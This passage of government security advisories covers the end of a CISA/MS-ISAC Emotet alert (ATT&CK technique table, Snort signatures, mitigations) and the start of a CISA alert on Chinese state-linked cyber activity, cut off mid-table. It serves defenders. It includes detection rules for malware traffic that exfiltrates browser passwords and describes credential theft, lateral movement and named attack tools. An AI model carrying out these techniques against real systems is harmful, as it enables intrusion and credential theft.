width: 448px;"> <p><em>Account Discovery: Email Account </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1087/003/">T1087.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that can scrape email addresses from Outlook.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Brute Force: Password Guessing </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1110/001/">T1110.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed using a hard-coded list of passwords to brute force user accounts.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Email Collection: Local Email Collection</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/001/">T1114.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that scrapes email data from Outlook.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious Link </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1204/001/">T1204.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has relied upon users clicking on a malicious link delivered through spearphishing.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Exploitation of Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210/">T1210</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (<a href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010">MS17-010</a>) to achieve lateral movement and propagation.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Create or Modify System Process: Windows Service </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1543/003/">T1543.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed creating new services to maintain persistence.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed adding the downloaded payload to the <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> key to maintain persistence.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Scheduled Task/Job: Scheduled Task</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005/">T1053.005</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has maintained persistence through a scheduled task.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Unsecured Credentials: Credentials In Files</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/001/">T1552.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003/">T1555.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed dropping browser password grabber modules.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Archive Collected Data </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1560/">T1560</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been observed encrypting the data it collects before sending it to the C2 server.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Phishing: Spearphishing Attachment</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001/">T1566.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been delivered by phishing emails containing attachments.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Phishing: Spearphishing Link</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002/">T1566.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has been delivered by phishing emails containing links.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Non-Standard Port</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1571/">T1571</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Encrypted Channel: Asymmetric Cryptography</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/002/">T1573.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>Emotet is known to use RSA keys for encrypting C2 traffic.</p> </td> </tr> </tbody> </table> <h3>Detection</h3> <h4>Signatures</h4> <p>MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.</p> <p><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET 443 (msg:"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords"; content:"POST"; http_method; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; fast_pattern; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|"; http_client_body; content:!"------WebKitFormBoundary"; http_client_body; content:!"Cookie|3a|"; pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)</code></p> <p>CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. <strong>Note:</strong> Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.</p> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-content/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-content/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:&lt;17; classtype:http-uri; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; metadata:service http;)</code></p> <p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-admin/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-admin/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:&lt;15; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; classtype:http-uri; metadata:service http;)</code></p> <h3>Mitigations</h3><p>CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.</p> <ul> <li>Block email attachments commonly associated with malware (e.g.,.dll and .exe).</li> <li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li> <li>Implement Group Policy Object and firewall rules.</li> <li>Implement an antivirus program and a formalized patch management process.</li> <li>Implement filters at the email gateway, and block suspicious IP addresses at the firewall.</li> <li>Adhere to the principle of least privilege.</li> <li>Implement a Domain-Based Message Authentication, Reporting &amp; Conformance validation system.</li> <li>Segment and segregate networks and functions.</li> <li>Limit unnecessary lateral communications.</li> <li>Disable file and printer sharing services. If these services are required, use <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">strong passwords</a> or Active Directory authentication.</li> <li>Enforce multi-factor authentication.</li> <li>Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to suspicious or risky sites.</li> <li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).</li> <li>Scan all software downloaded from the internet prior to executing.</li> <li>Maintain situational awareness of the latest threats and implement appropriate access control lists.</li> <li>Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.</li> <li>See CISA’s Alert on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> for more information on addressing potential incidents and applying best practice incident response procedures.</li> <li>See the joint <a href="https://www.cisa.gov/publication/ransomware-guide">CISA and MS-ISAC Ransomware Guide</a> on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.</li> </ul> <p>For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, <a href="https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final">Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a>.</p> <h3>Resources</h3> <ul> <li><a href="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/">MS-ISAC Security Event Primer – Emotet</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/TA18-201A">CISA Alert TA18-201A – Emotet Malware</a></li> <li><a href="https://attack.mitre.org/software/S0367/">MITRE ATT&amp;CK – Emotet</a></li> <li><a href="https://attack.mitre.org/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a></li> </ul> <h3>References</h3> <ul> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">[1] Bleeping Computer: Emotet Malware Strikes U.S. Businesses with COVID-19 Spam</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/">[2] IBID</a></li> <li><a href="https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/">[3] Security Lab: Emotet Update Increases Downloads</a></li> <li><a href="https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return">[4] Proofpoint: A Comprehensive Look at Emotet’s Summer 2020 Return</a></li> <li><a href="https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/">[5] ZDNet: France, Japan, New Zealand Warn of Sudden Strike in Emotet Attacks</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/">[6] Bleeping Computer: France Warns of Emotet Attacking Companies, Administration</a></li> <li><a href="https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/">[7] ESET: Emotet Strikes Quebec’s Department of Justice: An ESET Analysis</a></li> <li><a href="https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/">[8] ZDNet: Microsoft, Italy, and the Netherlands Warn of Increased Emotet Activity</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/">[9] Bleeping Computer: Emotet Double Blunder: Fake ‘Windows 10 Mobile’ and Outdated Messages</a></li> <li><a href="https://unit42.paloaltonetworks.com/emotet-thread-hijacking/">[10] Palo Alto Networks: Case Study: Emotet Thread Hijacking, an Email Attack Technique</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 6, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-275A: Potential for China Cyber Response to Heightened U.S.–China Tensions
Original release date: October 1, 2020 | Last revised: October 20, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p><em><strong>Note</strong>: on October 20, 2020, the National Security Agency (NSA) released a <a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">cybersecurity advisory</a> providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4).</em></p> <p>In light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.</p> <ol> <li><strong>Adopt a state of heightened awareness. </strong>Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.</li> <li><strong>Increase organizational vigilance.</strong> Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.</li> <li><strong>Confirm reporting processes.</strong> Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider <a href="https://us-cert.cisa.gov/report">reporting incidents</a> to CISA to help serve as part of CISA’s early warning system (see the Contact Information section below).</li> <li><strong>Exercise organizational incident response plans.</strong> Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.</li> </ol> <h3>Technical Details</h3><h4>China Cyber Threat Profile</h4> <p>China has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The “Made in China 2025” 10-year plan outlines China’s top-level policy priorities.[<a href="https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf">1</a>],[<a href="https://fas.org/sgp/crs/row/IF10964.pdf">2</a>] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[<a href="https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade">3</a>] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.</p> <p>The U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People’s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks–either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.</p> <h4>Chinese Cyber Activity</h4> <p>According to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.</p> <p>Additionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.</p> <p>Public reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:</p> <ul> <li><strong>February 2013 – Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:</strong> a comprehensive report publicly exposed APT1 as part of China’s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[<a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">4</a>] APT1 established access to the victims’ networks and methodically exfiltrated IP across a large range of industries identified in China’s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[<a href="https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor">5</a>]</li> <li><strong>April 2017 – Chinese APTs Targeting IP in 12 Countries:</strong> CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[<a href="https://us-cert.cisa.gov/ncas/alerts/TA17-117A">6</a>]</li> <li><strong>December 2018 – Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):</strong> DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[<a href="https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers">7</a>] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[<a href="https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf">8</a>]</li> <li><strong>February 2020 – China’s Military Indicted for 2017 Equifax Hack:</strong> DOJ indicted members of China’s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company’s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax’s trade secrets.[<a href="https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military">9</a>]</li> <li><strong>May 2020 – China Targets COVID-19 Research Organizations:</strong> the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[<a href="https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations">10</a>] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[<a href="https://us-cert.cisa.gov/ncas/alerts/AA20126A">11</a>],[<a href="https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity ">12</a>]</li> </ul> <h4>Common TTPs of Publicly Known Chinese Threat Actors</h4> <p>The section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&amp;CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions.&nbsp;&nbsp;&nbsp;</p> <h4>PRE-ATT&amp;CK TTPs</h4> <p>Chinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (<em>Technical Information Gathering</em> [<a href="https://attack.mitre.org/tactics/TA0015/">TA0015</a>]), staging (<em>Stage Capabilities</em> [<a href="https://attack.mitre.org/tactics/TA0026/">TA0026</a>]), and testing (<em>Test Capabilities</em> [<a href="https://attack.mitre.org/tactics/TA0025/">TA0025</a>]) before executing an attack. PRE-ATT&amp;CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.</p> <p class="MsoCaption text-align-center" style="page-break-after:avoid"><em>Table 1: Chinese threat actor PRE-ATT&amp;CK techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 844.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col"><strong>Technique</strong></th> <th scope="col" style="width: 630px;"><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left;"><em>Acquire and/or Use 3rd Party Software Services</em> [<a href="https://attack.mitre.org/techniques/T1330/">T1330</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Compromise 3rd Party Infrastructure to Support Delivery</em> [<a href="https://attack.mitre.org/techniques/T1334/">T1334</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure)</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Domain Registration Hijacking</em> [<a href="https://attack.mitre.org/techniques/T1326/">T1326</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Acquire Open-Source Intelligence (OSINT) Data Sets and Information</em> [<a href="https://attack.mitre.org/techniques/T1247/">T1247</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Gathering data and information from publicly available sources, including public-facing websites of the target organization</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Conduct Active Scanning </em>[<a href="https://attack.mitre.org/techniques/T1254/">T1254</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Analyze Architecture and Configuration Posture </em>[<a href="https://attack.mitre.org/techniques/T1288/">T1288</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Upload, Install, and Configure Software/Tools</em> [<a href="https://attack.mitre.org/techniques/T1362">T1362</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access</td> </tr> </tbody> </table> <h4>Enterprise ATT&amp;CK TTPs</h4> <p>Chinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:</p> <ul> <li>Cobalt Strike and Beacon</li> <li>Mimikatz</li> <li>PoisonIvy</li> <li>PowerShell Empire</li> <li>China Chopper Web Shell</li> </ul> <p>Table 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&amp;CK framework.</p> <p class="text-align-center"><em>Table 2: Common Chinese threat actor techniques, detection, and mitigation</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 849.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 134px;"><strong>Technique / Sub-Technique</strong></th> <th scope="col" style="width: 230px;"><strong>Detection</strong></th> <th scope="col" style="width: 466px;"><strong>Mitigation</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Obfuscated Files or Information </em>[<a href="https://attack.mitre.org/techniques/T1027/">T1027</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Detect obfuscation by analyzing signatures of modified files.</li> <li>Flag common syntax used in obfuscation.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use antivirus/antimalware software to analyze commands after processing.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Phishing: Spearphishing Attachment </em>[<a href="https://attack.mitre.org/techniques/T1566/001/">T1566.001</a>] and <em>Spearphishing Link </em>[<a href="https://attack.mitre.org/techniques/T1566/002/">T1566.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.</li> <li>Use detonation chambers to inspect email attachments in isolated environments.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Quarantine suspicious files with antivirus solutions.</li> <li>Use network intrusion prevention systems to scan and remove malicious email attachments.</li> <li>Train users to identify phishing emails and notify IT.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>System Network Configuration Discovery</em> [<a href="https://attack.mitre.org/techniques/T1016/">T1016</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Command and Scripting Interpreter: Windows Command Shell </em>[<a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Only permit execution of signed scripts.</li> <li>Disable any unused shells or interpreters. <p>&nbsp;</p> </li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>User Execution: Malicious File </em>[<a href="https://attack.mitre.org/techniques/T1204/002/">T1204.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.</li> <li>Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use execution prevention to prevent the running of executables disguised as other files.</li> <li>Train users to identify phishing attacks and other malicious events that may require user interaction.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </em>[<a href="https://attack.mitre.org/techniques/T1547/001/">T1547.001</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor the start folder for additions and changes.</li> <li>Monitor registry for changes to run keys that do not correlate to known patches or software updates.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Command and Scripting Interpreter: PowerShell </em>[<a href="https://attack.mitre.org/techniques/T1059/001/">T1059.001</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Enable PowerShell logging.</li> <li>Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.</li> <li>Monitor for PowerShell execution generally in environments where PowerShell is not typically used.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Set PowerShell execution policy to execute only signed scripts.</li> <li>Disable PowerShell if not needed by the system.</li> <li>Disable WinRM service to help prevent use of PowerShell for remote execution.</li> <li>Restrict PowerShell execution policy to administrators.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Hijack Execution Flow: DLL Side-Loading </em>[<a href="https://attack.mitre.org/techniques/T1574/002/">T1574.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use the program <code>sxstrace.exe</code> to check manifest files for side-loading vulnerabilities in software.</li> <li>Update software regularly including patches for DLL side-loading vulnerabilities.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Ingress Tool Transfer</em> [<a href="https://attack.mitre.org/techniques/T1105/">T1105</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.</li> <li>Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Remote System Discovery</em> [<a href="https://attack.mitre.org/techniques/T1018/">T1018</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor processes and command-line arguments for actions that could be taken to gather system and network information.</li> <li>In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Software Deployment Tools</em> [<a href="https://attack.mitre.org/techniques/T1072/">T1072</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.</li> <li>Patch deployment systems regularly.</li> <li>Use unique and limited credentials for access to deployment systems.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Brute Force: Password Spraying</em> [<a href="https://attack.mitre.org/techniques/T1110/003/">T1110.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor logs for failed authentication attempts to valid accounts.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use MFA.</li> <li>Set account lockout policies after a certain number of failed login attempts.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Network Service Scanning</em> [<a href="https://attack.mitre.org/techniques/T1046/">T1046</a>]</td> <td 